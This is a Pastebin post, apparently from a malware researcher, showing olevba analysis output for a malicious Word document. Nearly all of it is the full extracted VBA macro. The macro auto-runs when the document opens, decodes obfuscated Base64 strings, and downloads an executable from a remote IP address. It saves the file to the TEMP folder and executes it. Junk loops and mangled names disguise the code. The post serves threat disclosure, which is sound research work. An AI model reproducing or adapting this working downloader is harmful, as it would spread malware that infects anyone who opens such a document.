Advertisement
dynamoo

Malicious Word macro

Mar 12th, 2015
557
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 3020jqm.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 3020jqm.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. eHk
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO àâïàâï.bas
  27. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/\u0430\u0432\u043f\u0430\u0432\u043f'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Sub eHk()
  31. Set D8Hif8ju = CreateObject(ggSFhCPeLdOSshe(Chr$(84) & Chr$(86) & Chr$(78) & Chr$(89) & Chr$(84) & Chr$(85) & Chr$(119) & Chr$(121) & Chr$(76) & Chr$(108) & Chr$(78) & Chr$(108) & Chr$(99) & Chr$(110) & Chr$(90) & Chr$(108) & Chr$(99) & Chr$(108) & Chr$(104) & Chr$(78) & Chr$(84) & Chr$(69) & Chr$(104) & Chr$(85) & Chr$(86) & Chr$(70) & Chr$(65) & Chr$(61)))
  32. Set w2 = CreateObject(ggSFhCPeLdOSshe(Chr$(81) & Chr$(87) & Chr$(82) & Chr$(118) & Chr$(90) & Chr$(71) & Chr$(73) & Chr$(117) & Chr$(85) & Chr$(51) & Chr$(82) & Chr$(121) & Chr$(90) & Chr$(87) & Chr$(70) & Chr$(116)))
  33. D8Hif8ju.Open ggSFhCPeLdOSshe(Chr$(82) & Chr$(48) & Chr$(86) & Chr$(85)), ggSFhCPeLdOSshe(Chr$(97) & Chr$(72) & Chr$(82) & Chr$(48) & Chr$(99) & Chr$(72) & Chr$(77) & Chr$(54) & Chr$(76) & Chr$(121) & Chr$(56) & Chr$(53) & Chr$(77) & Chr$(105) & Chr$(52) & Chr$(50) & Chr$(77) & Chr$(121) & Chr$(52) & Chr$(52) & Chr$(79) & Chr$(67) & Chr$(52) & Chr$(120) & Chr$(77) & Chr$(68) & Chr$(73) & Chr$(118) & Chr$(89) & Chr$(88) & Chr$(66) & Chr$(112) & Chr$(76) & Chr$(50) & Chr$(100) & Chr$(105) & Chr$(77) & Chr$(83) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), False
  34. D8Hif8ju.SetOption 2, 13056
  35. D8Hif8ju.Send
  36. Dim ÁQÇëÑÍïó As Integer
  37. For ÁQÇëÑÍïó = 0 To 7
  38. Dim ñáÑëÁwÇô As Integer
  39. For ñáÑëÁwÇô = 0 To 7
  40. Dim ËqToôÂÔè As Integer
  41. For ËqToôÂÔè = 0 To 1
  42. DoEvents
  43. Next ËqToôÂÔè
  44. DoEvents
  45. Next ñáÑëÁwÇô
  46. Dim éáÃWèÏâê As Integer
  47. For éáÃWèÏâê = 0 To 5
  48. DoEvents
  49. Next éáÃWèÏâê
  50. DoEvents
  51. Next ÁQÇëÑÍïó
  52. Dim ÄÿøÊèÌ As Integer
  53. For ÄÿøÊèÌ = 0 To 3
  54. Dim áûÐÈÝÂè As Integer
  55. For áûÐÈÝÂè = 0 To 6
  56. DoEvents
  57. Next áûÐÈÝÂè
  58. DoEvents
  59. Next ÄÿøÊèÌ
  60. Dim ÖìÔÌíÃÈé As Integer
  61. For ÖìÔÌíÃÈé = 0 To 1
  62. DoEvents
  63. Next ÖìÔÌíÃÈé
  64. With w2
  65. Dim qéÊîôÄòÁ As Integer
  66. For qéÊîôÄòÁ = 0 To 4
  67. Dim ÕÖÈÏQóQW As Integer
  68. For ÕÖÈÏQóQW = 0 To 9
  69. Dim ÂôìõëÔÕÌ As Integer
  70. For ÂôìõëÔÕÌ = 0 To 5
  71. DoEvents
  72. Next ÂôìõëÔÕÌ
  73. DoEvents
  74. Next ÕÖÈÏQóQW
  75. Dim ÕÇûáËèïË As Integer
  76. For ÕÇûáËèïË = 0 To 4
  77. DoEvents
  78. Next ÕÇûáËèïË
  79. DoEvents
  80. Next qéÊîôÄòÁ
  81. Dim ëÐWëêäìÔ As Integer
  82. For ëÐWëêäìÔ = 0 To 5
  83. Dim êòóÅïwÏì As Integer
  84. For êòóÅïwÏì = 0 To 8
  85. DoEvents
  86. Next êòóÅïwÏì
  87. DoEvents
  88. Next ëÐWëêäìÔ
  89. Dim îóõéÊÈñÁ As Integer
  90. For îóõéÊÈñÁ = 0 To 9
  91. DoEvents
  92. Next îóõéÊÈñÁ
  93. .Type = 1
  94. Dim íÇÉqåwÕÑ As Integer
  95. For íÇÉqåwÕÑ = 0 To 3
  96. Dim îÑÔWéÅÒÛ As Integer
  97. For îÑÔWéÅÒÛ = 0 To 9
  98. Dim èîôÍõóãá As Integer
  99. For èîôÍõóãá = 0 To 3
  100. DoEvents
  101. Next èîôÍõóãá
  102. DoEvents
  103. Next îÑÔWéÅÒÛ
  104. Dim êÂÉöÈÔëð As Integer
  105. For êÂÉöÈÔëð = 0 To 3
  106. DoEvents
  107. Next êÂÉöÈÔëð
  108. DoEvents
  109. Next íÇÉqåwÕÑ
  110. Dim ðõqqÈÃîñ As Integer
  111. For ðõqqÈÃîñ = 0 To 6
  112. Dim ñÓÃÒàïÇé As Integer
  113. For ñÓÃÒàïÇé = 0 To 4
  114. DoEvents
  115. Next ñÓÃÒàïÇé
  116. DoEvents
  117. Next ðõqqÈÃîñ
  118. Dim ûéQÊôíâà As Integer
  119. For ûéQÊôíâà = 0 To 3
  120. DoEvents
  121. Next ûéQÊôíâà
  122. .Open
  123. Dim ïwëàãÖÏÛ As Integer
  124. For ïwëàãÖÏÛ = 0 To 4
  125. Dim ïÐõôõÊÍÔ As Integer
  126. For ïÐõôõÊÍÔ = 0 To 4
  127. Dim áèöçëàêè As Integer
  128. For áèöçëàêè = 0 To 3
  129. DoEvents
  130. Next áèöçëàêè
  131. DoEvents
  132. Next ïÐõôõÊÍÔ
  133. Dim ÀÕàÄèçõõ As Integer
  134. For ÀÕàÄèçõõ = 0 To 3
  135. DoEvents
  136. Next ÀÕàÄèçõõ
  137. DoEvents
  138. Next ïwëàãÖÏÛ
  139. Dim àÛÑàòòÀë As Integer
  140. For àÛÑàòòÀë = 0 To 2
  141. Dim ÕéwÑÒõÊê As Integer
  142. For ÕéwÑÒõÊê = 0 To 4
  143. DoEvents
  144. Next ÕéwÑÒõÊê
  145. DoEvents
  146. Next àÛÑàòòÀë
  147. Dim ÕéëÌàÎÎò As Integer
  148. For ÕéëÌàÎÎò = 0 To 4
  149. DoEvents
  150. Next ÕéëÌàÎÎò
  151. .Write D8Hif8ju.ResponseBody
  152. Dim ÌõWÌôïâW As Integer
  153. For ÌõWÌôïâW = 0 To 4
  154. Dim åëÖïûéÊô As Integer
  155. For åëÖïûéÊô = 0 To 6
  156. Dim ÎîÀëÃÏÐÓ As Integer
  157. For ÎîÀëÃÏÐÓ = 0 To 8
  158. DoEvents
  159. Next ÎîÀëÃÏÐÓ
  160. DoEvents
  161. Next åëÖïûéÊô
  162. Dim ÕÏîÄÎÄñq As Integer
  163. For ÕÏîÄÎÄñq = 0 To 1
  164. DoEvents
  165. Next ÕÏîÄÎÄñq
  166. DoEvents
  167. Next ÌõWÌôïâW
  168. Dim òñ÷ËÔâí As Integer
  169. For òñ÷ËÔâí = 0 To 8
  170. Dim óõÅÖòÄÛÕ As Integer
  171. For óõÅÖòÄÛÕ = 0 To 3
  172. DoEvents
  173. Next óõÅÖòÄÛÕ
  174. DoEvents
  175. Next òñ÷ËÔâí
  176. Dim ÓäëÈÇÇÑû As Integer
  177. For ÓäëÈÇÇÑû = 0 To 5
  178. DoEvents
  179. Next ÓäëÈÇÇÑû
  180. .SaveToFile Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61)), 2
  181. Dim ÌõWÂÂõëã As Integer
  182. For ÌõWÂÂõëã = 0 To 7
  183. Dim ÅëìíôÐàÖ As Integer
  184. For ÅëìíôÐàÖ = 0 To 7
  185. Dim ûÀÅÖàñöÒ As Integer
  186. For ûÀÅÖàñöÒ = 0 To 6
  187. DoEvents
  188. Next ûÀÅÖàñöÒ
  189. DoEvents
  190. Next ÅëìíôÐàÖ
  191. Dim âëôäåñàñ As Integer
  192. For âëôäåñàñ = 0 To 9
  193. DoEvents
  194. Next âëôäåñàñ
  195. DoEvents
  196. Next ÌõWÂÂõëã
  197. Dim ëáõÌÔðöÍ As Integer
  198. For ëáõÌÔðöÍ = 0 To 5
  199. Dim öûÂõwÀÂÑ As Integer
  200. For öûÂõwÀÂÑ = 0 To 3
  201. DoEvents
  202. Next öûÂõwÀÂÑ
  203. DoEvents
  204. Next ëáõÌÔðöÍ
  205. Dim ÖïûÃàÀÎÀ As Integer
  206. For ÖïûÃàÀÎÀ = 0 To 7
  207. DoEvents
  208. Next ÖïûÃàÀÎÀ
  209. End With
  210. Set pP5hKP = CreateObject(ggSFhCPeLdOSshe(Chr$(85) & Chr$(50) & Chr$(104) & Chr$(108) & Chr$(98) & Chr$(71) & Chr$(119) & Chr$(117) & Chr$(81) & Chr$(88) & Chr$(66) & Chr$(119) & Chr$(98) & Chr$(71) & Chr$(108) & Chr$(106) & Chr$(89) & Chr$(88) & Chr$(82) & Chr$(112) & Chr$(98) & Chr$(50) & Chr$(52) & Chr$(61)))
  211. pP5hKP.Open Environ(ggSFhCPeLdOSshe(Chr$(86) & Chr$(69) & Chr$(86) & Chr$(78) & Chr$(85) & Chr$(65) & Chr$(61) & Chr$(61))) & ggSFhCPeLdOSshe(Chr$(88) & Chr$(71) & Chr$(82) & Chr$(122) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(110) & Chr$(78) & Chr$(107) & Chr$(90) & Chr$(105) & Chr$(53) & Chr$(108) & Chr$(101) & Chr$(71) & Chr$(85) & Chr$(61))
  212. End Sub
  213.  
  214.  
  215. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  216. ANALYSIS:
  217. +------------+--------------+-----------------------------------------+
  218. | Type       | Keyword      | Description                             |
  219. +------------+--------------+-----------------------------------------+
  220. | Suspicious | CreateObject | May create an OLE object                |
  221. | Suspicious | SaveToFile   | May create a text file                  |
  222. | Suspicious | Open         | May open a file                         |
  223. | Suspicious | Environ      | May read system environment variables   |
  224. | Suspicious | Write        | May write to a file (if combined with   |
  225. |            |              | Open)                                   |
  226. | Suspicious | Chr          | May attempt to obfuscate specific       |
  227. |            |              | strings                                 |
  228. +------------+--------------+-----------------------------------------+
  229. -------------------------------------------------------------------------------
  230. VBA MACRO îîêåàûâ.bas
  231. in file: 3020jqm.doc - OLE stream: u'Macros/VBA/\u043e\u043e\u043a\u0435\u0430\u044b\u0432'
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233. Private Const clOneMask = 16515072
  234. Private Const clTwoMask = 258048
  235. Private Const clThreeMask = 4032
  236. Private Const clFourMask = 63
  237. Private Const clHighMask = 16711680
  238. Private Const clMidMask = 65280
  239. Private Const clLowMask = 255
  240. Private Const cl2Exp18 = 262144
  241. Private Const cl2Exp12 = 4096
  242. Private Const cl2Exp6 = 64
  243. Private Const cl2Exp8 = 256
  244. Private Const cl2Exp16 = 65536
  245.  
  246. Public Function ggSFhCPeLdOSshe(sString As String) As String
  247.     Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
  248.     Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
  249.     Dim lTemp As Long
  250.     sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
  251.    sString = Replace(sString, vbLf, vbNullString)      'either order.
  252.    lTemp = Len(sString) Mod 4                          'Test for valid input.
  253.    If lTemp Then
  254.         Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
  255.     End If
  256.     If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
  257.        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
  258.    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
  259.        iPad = 1
  260.     End If
  261.     For lTemp = 0 To 255                                'Fill the translation table.
  262.        Select Case lTemp
  263.             Case 65 To 90
  264.                 bTrans(lTemp) = lTemp - 65              'A - Z
  265.            Case 97 To 122
  266.                 bTrans(lTemp) = lTemp - 71              'a - z
  267.            Case 48 To 57
  268.                 bTrans(lTemp) = lTemp + 4               '1 - 0
  269.            Case 43
  270.                 bTrans(lTemp) = 62                      'Chr(43) = "+"
  271.            Case 47
  272.                 bTrans(lTemp) = 63                      'Chr(47) = "/"
  273.        End Select
  274.     Next lTemp
  275.     For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
  276.        lPowers6(lTemp) = lTemp * cl2Exp6
  277.         lPowers12(lTemp) = lTemp * cl2Exp12
  278.         lPowers18(lTemp) = lTemp * cl2Exp18
  279.     Next lTemp
  280.     bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
  281.    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.
  282.    For lChar = 0 To UBound(bIn) Step 4
  283.         lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  284.                 lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
  285.        lTemp = lQuad And clHighMask                    'Mask for the first byte
  286.        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
  287.        lTemp = lQuad And clMidMask                     'Mask for the second byte
  288.        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
  289.        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
  290.        lPos = lPos + 3
  291.     Next lChar
  292.     sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
  293.    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
  294.    ggSFhCPeLdOSshe = sOut
  295. End Function
  296. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  297. ANALYSIS:
  298. +------------+----------------+-----------------------------------------+
  299. | Type       | Keyword        | Description                             |
  300. +------------+----------------+-----------------------------------------+
  301. | Suspicious | Output         | May write to a file (if combined with   |
  302. |            |                | Open)                                   |
  303. | Suspicious | Chr            | May attempt to obfuscate specific       |
  304. |            |                | strings                                 |
  305. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  306. |            |                | be used to obfuscate strings (option    |
  307. |            |                | --decode to see all)                    |
  308. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  309. |            |                | may be used to obfuscate strings        |
  310. |            |                | (option --decode to see all)            |
  311. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement